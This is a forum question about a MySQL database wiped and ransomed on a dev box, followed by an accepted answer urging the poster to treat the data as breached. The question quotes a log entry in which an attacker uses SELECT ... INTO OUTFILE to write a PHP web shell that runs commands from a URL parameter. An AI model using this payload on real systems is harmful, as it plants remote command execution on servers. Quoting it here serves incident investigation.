I had a test mysql database running on Vagrant dev box. Turns out the network wasn't that secure.
All of the databases were deleted (and replaced with a DB ransomware note) and in the logs I can see all of the drop db commands. However, I don't see any sign of dump or mysql dump commands anywhere.
There are some commands like below in the logs.
Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
Query SELECT "CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>" INTO OUTFILE '/home/http/817BCD5B9C3A4B79D312345AB.php'
However, none of the outfiles existed anywhere. Could data have been downloaded via the outfiles, or was that a means to run external commands?
I don't care that the data was deleted as this was just dev and there are many backups. The question is, could data have been downloaded if there were no dump commands? If so, what do I need to look for? I just need to try and confirm if hackers took some data, which could be leaked etc.
Best Answer
You do realize, for ransomeware to function, they have to have a copy of your data if they deleted your local copy? Otherwise there isn’t much to ransom - if they just deleted it, what would you pay for? Often times they will send a segment of data to prove they have a copy.
Whatever data is in that database, consider it fully breached. Keep in mind that if you have any European citizen data, the breach needs to be publicly disclosed within 72 hours of discovery.